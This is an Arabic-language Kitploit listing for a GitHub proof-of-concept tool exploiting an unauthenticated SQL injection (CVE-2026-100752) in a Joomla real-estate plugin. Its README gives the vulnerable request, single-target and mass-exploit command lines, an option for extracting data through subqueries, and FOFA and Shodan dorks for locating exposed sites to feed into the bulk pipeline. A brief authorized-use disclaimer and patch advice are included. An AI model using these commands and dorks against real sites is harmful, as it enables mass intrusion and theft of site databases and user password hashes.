Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

الخلاصاتاتصالالخصوصية© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-100752 — أداة PoC بلغة Python 3 واستغلال جماعي لـ CVE-2026-100752، وهو حقن SQL غير مُصادَق عليه في OrdaSoft Joomla Real Estate Manager <=6.7.8 عبر معامل order_field ORDER BY. | Kitploit
أدوات/GitHubGitHub/murrez/cve-2026-100752
الاستطلاعماسحات الثغرات الأمنيةتحليل الثغرات الأمنيةالاستغلالالبرمجة النصية والأتمتةاستغلال تطبيقات الويبجمع المعلوماتأمن الويباختبار الاختراق
GitHubmurrez/cve-2026-100752

CVE-2026-100752

أداة PoC بلغة Python 3 واستغلال جماعي لـ CVE-2026-100752، وهو حقن SQL غير مُصادَق عليه في OrdaSoft Joomla Real Estate Manager <=6.7.8 عبر معامل order_field ORDER BY.

منذ 4 أياملم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع

CVE-2026-100752 — OrdaSoft Real Estate Manager (Free) حقن SQL بدون مصادقة

Python 3 PoC لـ CVE-2026-100752 — إضافة Joomla OrdaSoft Real Estate Manager (Free) ≤ 6.7.8. تم إصلاحها في 6.7.9+.

PoCbithttps://pocbit.org/pocs/cve-2026-100752
Cataloghttps://pocbit.org/pocs/
Componentcom_realestatemanager
Filesite/realestatemanager.php
Parameterorder_field → ORDER BY (غير مُقتبس، بدون قائمة سماح)
Authلا يوجد (عرض القوائم العامة / البحث / عرض التصنيفات)
CWECWE-89 حقن SQL
Alsoحقن POST القديم order_direction (Metasploit / تدقيقات ما قبل 6.7.9)

PoC output (screenshot)

شعار PoCbit الملوّن، ثم مخرجات JSON لوضع --mode exploit: exploited: true، المتجه order_field_get، المسار showCategory + com_realestatemanager.

CVE-2026-100752 exploit mode — PoCbit CLI and JSON result (order_field_get, sqli_extract_ok)

مثال على الأمر:

python poc.py -u https://TARGET --mode exploit --subquery "SELECT VERSION()"

(أُخذت لقطة الشاشة من بيئة اختبار مصرّح بها؛ عنوان URL الهدف مخصص للتحقق من PoC.)


Vulnerability summary (Türkçe)

Real Estate Manager (Free) هي إضافة من OrdaSoft لإدارة إعلانات العقارات على Joomla. في الإصدارات 6.7.8 وما قبلها، يُضاف معامل الطلب order_field مباشرةً إلى جملة ORDER BY داخل site/realestatemanager.php؛ لا توجد قائمة سماح لأسماء الأعمدة، ولا تهريب، ولا تحويل نوع. يمكن استغلال استعلامات تصفح التصنيفات ونتائج البحث وقائمة الإعلانات الكاملة دون مصادقة.

مع نجاح حقن SQL، يجب تقييم القراءة من قاعدة البيانات (الإصدار، تجزئات المستخدمين، بيانات الموقع)، والكتابة/الحذف حسب الصلاحيات، وخطر RCE المتسلسل. قم بالترقية إلى الإصدار 6.7.9 أو أحدث (OrdaSoft security release).


Technical mechanism

متحكم Joomla الأمامي:

GET /index.php?option=com_realestatemanager&task=showCategory&catid=50&order_field=price&order_direction=asc

CVE-2026-100752: يتحكم order_field في عمود/تعبير ORDER BY. يمكن حقن قيم مثل الاستعلامات الفرعية القائمة على الأخطاء لأن القيمة تُدمج في SQL دون ربط أو تحقق.

سياقات الاستعلام المتأثرة (وفق نص CVE):

  1. تصفح التصنيفات (showCategory وما يتصل بها)
  2. نتائج البحث
  3. قائمة العقارات الكاملة

هذا الـ PoC:

  • بصمة com_realestatemanager (المسارات + إصدار manifest اختياري)
  • استخراج catid / Itemid من HTML الموقع
  • فحص المهام: showCategory، showSearch، showSearchResult، showRent، showBuy
  • الأساسي: order_field القائم على الأخطاء عبر GET و POST
  • الاحتياطي: order_direction=asc,<injection> (متجه تاريخي، لا يزال مفيدًا في بعض الإصدارات)
  • Check + mass check → hits.txt
  • Exploit + mass exploit → exploited.txt (الأسطر التي تحتوي على تسريب SELECT ناجح)

Requirements

cd CVE-2026-100752
pip install -r requirements.txt

Usage

Single target — check

python poc.py -u https://target.example --mode check
python poc.py -u https://target.example --mode check --aggressive

يحاول --aggressive تنفيذ SELECT VERSION() عندما يكون إثبات boolean/error غير حاسم.

Single target — exploit

python poc.py -u https://target.example --mode exploit
python poc.py -u https://target.example --mode exploit --subquery "SELECT user()"
python poc.py -u https://target.example --mode exploit --vector order_field_get

Mass bulk

python poc.py --list targets.example.txt --mode check -j 30 --output scan.jsonl --vuln-list hits.txt
python poc.py --list hits.txt --mode exploit -j 15 --subquery "SELECT VERSION()" --exploited-list exploited.txt
FlagRole
--mode exploitاستخراج البيانات القائم على الأخطاء (يدعم الجماعي)
--subquerySQL الداخلي لحمولة الاستعلام المزدوج CONCAT(0x7e, …)
--vectorفرض order_field_get أو order_field_post أو order_direction_post
-jالأهداف المتوازية
--no-colorطرفية عادية

يتضمن JSONL الحقول pocbit، pocbit_catalog، pocbit_page، cve، component.


FOFA / asset discovery dorks

body="option=com_realestatemanager"
body="com_realestatemanager" && (body="ordasoft" || header="Joomla")
title="Real Estate" && body="com_realestatemanager"
body="/components/com_realestatemanager/"

بنمط Shodan (إن كان مدعومًا): http.html:com_realestatemanager

صدّر أسماء المضيفين إلى targets.txt (عنوان URL واحد لكل سطر)، ثم check → hits → exploit فقط على العقارات المصرّح بها.


Version detection

Manifest (عند كشفه):

  • /administrator/components/com_realestatemanager/realestatemanager.xml

إذا كان الإصدار ≤ 6.7.8 → likely_vulnerable_version. إذا كان ≥ 6.7.9 → patched_version (قد يفشل الاستغلال رغم ذلك).


Related CVEs (same release train)

CVETypeFixed
CVE-2026-100752حقن SQL بدون مصادقة (order_field)6.7.9
CVE-2026-100753XSS منعكس (عروض العقارات العامة)6.7.9

دفعة المورّد نفسها (سبتمبر 2026): حصل Vehicle Manager وإضافات OrdaSoft الأخرى على CVEs منفصلة — قم بترقيع جميع مكونات OrdaSoft التي تشغّلها.


References

  • PoCbit CVE-2026-100752
  • CVE.report CVE-2026-100752
  • JoomClub — six flaws in three OrdaSoft extensions (سبتمبر 2026)
  • Metasploit: auxiliary/gather/joomla_com_realestatemanager_sqli (متجه POST القديم order_direction)

Legal

للاختبار الأمني المصرّح به والتحقق من الترقيعات فقط. لا تستخدمه ضد أنظمة دون إذن.


GitHub repository description

CVE-2026-100752 PoC: OrdaSoft Joomla Real Estate Manager (Free) <=6.7.8 unauth SQLi via order_field ORDER BY (com_realestatemanager). Colored check + mass exploit, version fingerprint, PoCbit https://pocbit.org/pocs/cve-2026-100752
تنزيل الأداة